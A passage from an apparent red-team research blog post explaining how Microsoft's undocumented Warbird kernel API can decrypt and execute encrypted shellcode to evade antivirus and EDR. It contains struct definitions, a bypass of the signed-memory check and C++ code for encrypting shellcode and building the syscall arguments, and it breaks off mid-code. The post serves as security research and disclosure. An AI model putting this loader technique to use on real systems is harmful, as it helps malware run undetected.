enquiry<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t<div class=\"elementor-element elementor-element-9865c47 e-flex e-con-boxed e-con e-parent\" data-id=\"9865c47\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4efe62d elementor-widget elementor-widget-html\" data-id=\"4efe62d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<script>\n\ndocument.addEventListener('DOMContentLoaded', function() {\njQuery(function($) {\nvar mywindow = $(window);\nvar mypos = mywindow.scrollTop();\nlet scrolling = false;\nwindow.addEventListener('scroll', function() {\nscrolling = true;\n});\nsetInterval(() => {\nif (scrolling) {\nscrolling = false;\nif (mypos > 40) {\nif (mywindow.scrollTop() > mypos) {\n$('#header--sticky').addClass('headerup');\n} else {\n$('#header--sticky').removeClass('headerup');\n}\n}\nmypos = mywindow.scrollTop();\n}\n}, 300);\n});\n});\n\n<\/script>\n<style>\n#header--sticky{\ntransition : transform 0.34s ease;\n}\n.headerup{\ntransform: translateY(-110px); \/*adjust this value to the height of your header*\/\n}\n<\/style>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/header>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4a58ac0 elementor-reverse-mobile elementor-section-height-min-height elementor-section-items-stretch elementor-section-boxed elementor-section-height-default\" data-id=\"4a58ac0\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-59de245\" data-id=\"59de245\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1ebe3812 elementor-widget elementor-widget-post-info\" data-id=\"1ebe3812\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"post-info.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-inline-items elementor-icon-list-items elementor-post-info\">\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item elementor-repeater-item-59da575 elementor-inline-item\" itemprop=\"about\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-terms\">\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-post-info__terms-list\">\n\t\t\t\t<span class=\"elementor-post-info__terms-list-item\">Blog<\/span>, <span class=\"elementor-post-info__terms-list-item\">Red Teaming<\/span>, <span class=\"elementor-post-info__terms-list-item\">Reverse Engineering<\/span>, <span class=\"elementor-post-info__terms-list-item\">Windows<\/span>\t\t\t\t<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1cffca5 elementor-widget elementor-widget-heading\" data-id=\"1cffca5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Abusing Microsoft Warbird for Shellcode Execution<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-35f7268b elementor-widget elementor-widget-spacer\" data-id=\"35f7268b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-15227deb elementor-widget elementor-widget-text-editor\" data-id=\"15227deb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>November 7, 2024<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-41d9498d elementor-hidden-mobile_extra elementor-hidden-mobile\" data-id=\"41d9498d\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b5595b0 elementor-widget elementor-widget-spacer\" data-id=\"b5595b0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-620b16bb elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"620b16bb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-68a852c6\" data-id=\"68a852c6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-50327222 elementor-widget elementor-widget-menu-anchor\" data-id=\"50327222\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"section1\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4f757986 elementor-widget elementor-widget-heading\" data-id=\"4f757986\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Abusing Microsoft Warbird for Shellcode Execution<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-e3ccda7 elementor-widget elementor-widget-text-editor\" data-id=\"e3ccda7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>TL;DR<\/h2><p>In this blog post, we&#8217;ll be covering Microsoft Warbird and how we can abuse it to sneakily load shellcode without being detected by AV or EDR solutions. We&#8217;ll show how we can encrypt our shellcode and let the Windows kernel decrypt and load it for us using the Warbird API. Using this technique, you can hide your shellcode from syscall-intercepting EDR solutions allowing you to allocate executable memory, decrypt the shellcode, and jump to the decrypted shellcode all in one syscall, without ever having decrypted shellcode at any writeable memory region at any point during the execution of your process. Check out the PoC on\u00a0<span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/cirosec\/warbird-demos\">GitHub<\/a><\/span><a href=\"https:\/\/cirosec.de\/en\/news\/google-doc2\/#_ftn1\" name=\"_ftnref1\"><\/a>.<\/p><h2>Basics<\/h2><h3>Introduction<\/h3><p>Microsoft Warbird is Microsoft&#8217;s undocumented internal code protection and obfuscation framework. It is used for DRM to protect sensitive code from reverse engineering and tampering. Warbird supports multiple obfuscation techniques like VM-based obfuscation, constant obfuscation, section encryption or runtime code protection. According to <span style=\"text-decoration: underline;\"><a href=\"https:\/\/thisiscybersec.wordpress.com\/2014\/10\/15\/warbird-operation\/\">This is Security<\/a><\/span>, Microsoft Warbird was introduced in Windows 8\/2012. One application is, e.g., the Microsoft Software Protection Platform Service (sppsvc.exe), which handles the Windows activation algorithms.<\/p><p>The Warbird framework is intended to be used exclusively by Microsoft services. The functionality provided by Warbird is not intended to be used by third-party developers, and Microsoft actively tries to prevent this. Before we show you how to abuse it anyway, let&#8217;s first describe how Microsoft services would normally use Warbird.<\/p><h3>Runtime Code Protection<\/h3><p>The feature of Warbird that we are interested in for loading shellcode is the runtime decryption of code.<\/p><p>The runtime decryption feature of Warbird allows for the execution of encrypted code. The code is encrypted using a custom <span style=\"text-decoration: underline;\"><a href=\"https:\/\/en.wikipedia.org\/wiki\/Feistel_cipher)\">Feistel cipher<\/a><\/span> developed specifically for Warbird. How exactly a Feistel cipher works is not important for us right now, just know that it is a symmetric encryption algorithm that operates on blocks of data.<\/p><p>When Warbird was first introduced, the decryption and execution of the basic blocks were simply performed by the process in user mode. This meant that when the executing process wanted to execute encrypted code, it would use the Feistel cipher to decrypt it, allocate new executable memory, place the decrypted code in this memory, and then jump to the beginning of the decrypted code.<\/p><p>To mitigate some unrelated attack vectors (think ROP chain and the like), at some point Microsoft decided that some user mode processes are forbidden from allocating new executable memory, by introducing <span style=\"text-decoration: underline;\"><a href=\"https:\/\/learn.microsoft.com\/en-us\/microsoft-365\/security\/defender-endpoint\/exploit-protection-reference?view=o365-worldwide#arbitrary-code-guard\">Arbitrary Code Guard<\/a><\/span> (ACG). This prevents memory corruption exploits from using the Windows API to allocate new executable memory and placing their shellcode there. ACG also prevented Warbird from working in these processes, so the decryption and allocation of the encrypted code was moved to the kernel level. This means that the Windows kernel is responsible for allocating memory in the process&#8217;s heap and marking it as executable, so that Warbird can be used even when the executing process is not allowed to allocate executable memory , for example by specially protected browser processes of the legacy Microsoft Edge. To reiterate, Microsoft decided that it would be safer to offer a kernel-level API for the decryption and allocation of code, rather than allowing the process itself to decrypt its encrypted code, which should be enough to raise some eyebrows.<\/p><p>The flow of the runtime decryption routine is as follows:<\/p><ol><li>The process wants to execute encrypted code.<\/li><li>The process locates the corresponding encrypted code in its own memory and passes it to the kernel.<\/li><li>The kernel decrypts the code, allocates a new executable memory region in the process&#8217;s heap, copies the decrypted code into this new memory region, and marks it as executable.<\/li><li>The kernel passes execution control back to the process at the beginning of the decrypted code.<\/li><\/ol>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-55622bbe elementor-widget elementor-widget-image\" data-id=\"55622bbe\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/10\/Shellcode_1.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Shellcode_1\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6MjAyOTksInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI0XC8xMFwvU2hlbGxjb2RlXzEucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img decoding=\"async\" width=\"291\" height=\"300\" src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/10\/Shellcode_1-291x300.png\" class=\"attachment-medium size-medium wp-image-20299\" alt=\"\" srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2024\/10\/Shellcode_1-291x300.png 291w, https:\/\/cirosec.de\/wp-content\/uploads\/2024\/10\/Shellcode_1.png 656w\" sizes=\"(max-width: 291px) 100vw, 291px\" \/>\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 1: Runtime decryption of encrypted code using Warbird<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ad41818\" data-id=\"ad41818\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3e48f967 elementor-widget elementor-widget-image-box\" data-id=\"3e48f967\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><div class=\"elementor-image-box-title\">Jan-Luca Gruber and Frederik Reiter<\/div><p class=\"elementor-image-box-description\">Consultants<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-17e4f111 elementor-widget elementor-widget-heading\" data-id=\"17e4f111\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Category<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5c03d0a elementor-widget elementor-widget-post-info\" data-id=\"5c03d0a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"post-info.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items elementor-post-info\">\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item elementor-repeater-item-59da575\" itemprop=\"about\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-terms\">\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-post-info__terms-list\">\n\t\t\t\t<span class=\"elementor-post-info__terms-list-item\">Blog<\/span>, <span class=\"elementor-post-info__terms-list-item\">Red Teaming<\/span>, <span class=\"elementor-post-info__terms-list-item\">Reverse Engineering<\/span>, <span class=\"elementor-post-info__terms-list-item\">Windows<\/span>\t\t\t\t<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2ee109cb elementor-widget elementor-widget-heading\" data-id=\"2ee109cb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Date<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-60bec467 elementor-widget elementor-widget-post-info\" data-id=\"60bec467\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"post-info.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items elementor-post-info\">\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item elementor-repeater-item-59da575\" itemprop=\"datePublished\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-date\">\n\t\t\t\t\t\t\t\t\t\t<time>2024-11-07<\/time>\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5dc28b9c elementor-widget elementor-widget-heading\" data-id=\"5dc28b9c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Navigation<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-628fa5ee elementor-widget elementor-widget-table-of-contents\" data-id=\"628fa5ee\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;],&quot;exclude_headings_by_selector&quot;:[],&quot;marker_view&quot;:&quot;bullets&quot;,&quot;icon&quot;:{&quot;value&quot;:&quot;fas fa-chevron-right&quot;,&quot;library&quot;:&quot;fa-solid&quot;},&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div id=\"elementor-toc__628fa5ee\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<i class=\"elementor-toc__spinner eicon-animation-spin eicon-loading\" aria-hidden=\"true\"><\/i>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-187aeb7e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"187aeb7e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-4d4659e9\" data-id=\"4d4659e9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-277fe02d elementor-widget elementor-widget-menu-anchor\" data-id=\"277fe02d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"info-event\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-761b944a elementor-widget elementor-widget-menu-anchor\" data-id=\"761b944a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"section2\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-75db76e9 elementor-widget elementor-widget-text-editor\" data-id=\"75db76e9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3>Feistel Cipher<\/h3><p>The custom Feistel cipher used by Warbird is a custom implementation and not documented at all by Microsoft.<\/p><p>Thankfully, <span style=\"text-decoration: underline;\"><a href=\"https:\/\/downwithup.github.io\/blog\/post\/2023\/04\/23\/post9.html\">a blog post by DownWithUp<\/a><\/span> already documents how the Warbird API can be used to encrypt arbitrary data using a clever combination of syscalls to make the kernel perform the encryption for you. That way, we can use the kernel as a &#8220;black box&#8221; implementation of the Feistel cipher, without having to know the details of the cipher itself.<\/p><p>We experimented around with using their technique to encrypt data for the Warbird decryption routine but were unable to use the encrypted data with the runtime decryption. Lucky for us, a source code leak of the Warbird framework from 2017 contains a working implementation of the Feistel cipher used by Warbird, which we can use to encrypt our shellcode for the runtime decryption routine. This source code has been circulating on the internet for a while and has recently become available <span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/br4ndn\/warbird-example\">on GitHub<\/a><\/span>.<\/p><h3>Warbird Syscall<\/h3><p>To request a decryption and allocation from the kernel, the process must call the NtQuerySystemInformation syscall with the SystemInformationClass set to SystemCodeFlowTransition (0xB9). Although this is not officially documented by Microsoft, thanks to the leak of Windows source code, we have access to a lot of information about this syscall. The syscall takes a pointer to a struct containing a WbOperationType that specifies the operation to be performed, and a pointer to a struct containing additional data for the operation. According to the leaked source code, the WbOperationType enum contains the following values:<\/p><pre><strong>typedef enum {<\/strong><br \/> \u00a0\u00a0 WbOperationNone,<br \/> \u00a0\u00a0 WbOperationDecryptEncryptionSegment,<br \/> \u00a0\u00a0 WbOperationReEncryptEncryptionSegment,<br \/> \u00a0\u00a0 WbOperationHeapExecuteCall,<br \/> \u00a0\u00a0 WbOperationHeapExecuteReturn,<br \/> \u00a0\u00a0 WbOperationHeapExecuteUnconditionalBranch,<br \/> \u00a0\u00a0 WbOperationHeapExecuteConditionalBranch,<br \/> \u00a0\u00a0 WbOperationProcessEnd,<br \/> \u00a0\u00a0 WbOperationProcessStartup,<br \/>} WbOperationType;<\/pre><p>We will focus on the WbOperationHeapExecuteCall operation, which can be used to perform the described decryption and allocation routine in the kernel. The struct that is passed to the syscall for this operation is also part of the leaked source code but appears to have changed slightly since the leak. Combining the leak with the information from <span style=\"text-decoration: underline;\"><a href=\"https:\/\/www.youtube.com\/watch?v=gu_i6LYuePg\">Alex Ionescu&#8217;s talk about Warbird at Ekoparty 2017<\/a><\/span>, we can assume that the struct looks something like this:<\/p><pre>typedef struct _HEAP_EXECUTE_CALL_ARGUMENT {<br \/> \u00a0\u00a0 uint8_t ucHash[0x20];<br \/> \u00a0\u00a0 uint32_t ulStructSize;<br \/> \u00a0\u00a0 uint32_t ulZero;<br \/> \u00a0\u00a0 uint32_t ulParametersRva;<br \/> \u00a0\u00a0 uint32_t ulCheckStackSize;<br \/> \u00a0\u00a0 uint32_t ulChecksum : CHECKSUM_BIT_COUNT;<br \/> \u00a0\u00a0 uint32_t ulWrapperChecksum : CHECKSUM_BIT_COUNT;<br \/> \u00a0\u00a0 uint32_t ulRva : RVA_BIT_COUNT;<br \/> \u00a0\u00a0 uint32_t ulSize : FUNCTION_SIZE_BIT_COUNT;<br \/> \u00a0\u00a0 uint32_t ulWrapperRva : RVA_BIT_COUNT;<br \/> \u00a0\u00a0 uint32_t ulWrapperSize : FUNCTION_SIZE_BIT_COUNT;<br \/> \u00a0\u00a0 uint64_t ullKey;<br \/> \u00a0\u00a0 WarbirdRuntime::FEISTEL64_ROUND_DATA RoundData[NUMBER_FEISTEL64_ROUNDS];<br \/>} HEAP_EXECUTE_CALL_ARGUMENT, * PHEAP_EXECUTE_CALL_ARGUMENT;<\/pre><p>We&#8217;ll only highlight the most important fields for our purposes:<\/p><ul><li>ucHash: A 32-byte SHA-256 hash of the following fields in the struct. If this hash does not match the hash of the rest of the struct, the kernel will refuse to perform the operation. This is used to prevent tampering with the struct, as the hash is calculated over the fields that are relevant for the decryption and allocation. Note that this hash does not provide authentication, only integrity, so an attacker could still modify the struct, given that they can calculate a new hash for the modified struct.<\/li><li>ulStructSize: The size of the struct in bytes.<\/li><li>ulRva: The offset of the encrypted code relative to the start of the struct in memory<a href=\"#_ftn1\" name=\"_ftnref1\">[1]<\/a>.<\/li><li>ulSize: The size of the encrypted code in bytes.<\/li><li>ullKey: The 8-byte key used for the Feistel cipher.<\/li><li>RoundData: Configuration data for each round of the Feistel cipher.<\/li><\/ul><p>All other fields are not relevant for our purposes and should be set to zero.<\/p><p>The complete struct passed to the syscall then simply contains the WbOperationType, the HEAP_EXECUTE_CALL_ARGUMENT struct, and a pointer to a NTSTATUS variable that will receive the result of the operation:<\/p><pre>typedef struct _WB_OPERATION {<br \/> \u00a0\u00a0 WarbirdRuntime::WbOperationType OperationType;<br \/> \u00a0\u00a0 union {<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ ...<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 PHEAP_EXECUTE_CALL_ARGUMENT pHeapExecuteCallArgument;<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/ ...<br \/> \u00a0\u00a0 };<br \/> \u00a0\u00a0 NTSTATUS* Result;<br \/>} WB_OPERATION, * PWB_OPERATION;<\/pre><h2>Abusing Warbird<\/h2><p>As previously stated, only Microsoft services are intended to invoke Warbird syscalls. To enforce this, the Windows kernel requires the HEAP_EXECUTE_CALL_ARGUMENT struct to be in a memory region that is marked with a ImageSigningLevel of (12), which indicates that the memory region &#8220;belongs to&#8221; a Windows component. As already noted by <span style=\"text-decoration: underline;\"><a href=\"https:\/\/downwithup.github.io\/blog\/post\/2023\/04\/23\/post9.html\">DownWithUp<\/a><\/span>, this check can quite easily be bypassed by first loading a Microsoft-signed DLL into your own process, and then using VirtualProtect(RW) and memcpy to change the contents of the DLL&#8217;s .text section to contain the HEAP_EXECUTE_CALL_ARGUMENT struct. For our convenience, we place the encrypted shellcode directly after the struct in the .text section and set the ulRva field simply to the size of the struct. This way, the kernel will decrypt the shellcode directly after the struct in the same memory region.<\/p><p>After the data has been placed, the .text section must be marked as executable using VirtualProtect(RX) and can then be used to invoke the Warbird syscall.<\/p><h3>Preparation<\/h3><p>We first need to encrypt the shellcode we want to execute using the Feistel cipher. We can use the implementation from the leaked Warbird source code to do this:<\/p><pre>BYTE shellcode[] = { ...};<br \/>BYTE encrypted[sizeof(shellcode)];<br \/>auto cipher = WarbirdCrypto::CCipherFeistel64::CreateRandom();<br \/>WarbirdCrypto::CChecksum checksum;<br \/>WarbirdCrypto::CKey key { .u64 = 0xdeadbeefcafeaffe };<br \/>cipher-&gt;Encrypt((BYTE*) shellcode, (BYTE*) encrypted, sizeof(shellcode), key, 0xf0, &amp;checksum);<\/pre><p>The WarbirdCrypto namespace can be taken directly from the <span style=\"text-decoration: underline;\"><a href=\"https:\/\/github.com\/gmh5225\/warbird-example\/blob\/main\/WarbirdCiphers.inl\">leaked source code<\/a><\/span> and #included in your project. The headers from the leaked source code are not functional on their own, and require some additional includes to work, as well as a workaround to use them outside of the WarbirdRuntime namespace:<\/p><pre>#include &lt;Windows.h&gt;<br \/>#include &lt;set&gt;<br \/>#include &lt;sstream&gt;<br \/>#define WARBIRD_CRYPTO_ENABLE_CREATE_RANDOM<br \/>#include \"..\/warbird-example\/WarbirdCUtil.inl\"<br \/>#include \"..\/warbird-example\/WarbirdRandom.inl\"<br \/>#define Random WarbirdRuntime::g_Rand.Random<br \/>#include \"..\/warbird-example\/WarbirdCiphers.inl\"<br \/>#undef Random\n<\/pre><p>To load the encrypted shellcode, we need to create the HEAP_EXECUTE_CALL_ARGUMENT struct:<\/p><pre>HEAP_EXECUTE_CALL_ARGUMENT params{<br \/>.ucHash = { }, \/\/ We'll leave this empty for now<br \/>.ulStructSize = sizeof(HEAP_EXECUTE_CALL_ARGUMENT),<br \/>.ulZero = 0,<br \/>.ulParametersRva = 0,<br \/>.ulCheckStackSize = 0,<br \/>.ulChecksum = 0,<br \/>.ulWrapperChecksum = 0,<br \/>.ulRva = sizeof(HEAP_EXECUTE_CALL_ARGUMENT), \/\/ shellcode starts right after the struct<br \/>.ulSize = static_cast&lt;uint32_t&gt;(sizeof(shellcode)),<br \/>.ulWrapperRva = 0,<br \/>.ulWrapperSize = 0,<br \/>.ullKey = key.u64,<br \/>.RoundData = { }<br \/>};<br \/>\/\/ Copy over the round configuration<br \/>memcpy(params.RoundData, cipher-&gt;m_Rounds, sizeof(cipher-&gt;m_Rounds));<br \/>\/\/ Lastly, calculate the hash of the struct<br \/>picosha2::hash256(<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 reinterpret_cast&lt;uint8_t*&gt;(&amp;params.ulStructSize), \/\/ Start after the hash field<br \/> \u00a0\u00a0\u00a0\u00a0\u00a0 reinterpret_cast&lt;uint8_t*&gt;(&amp;params + 1), \/\/ 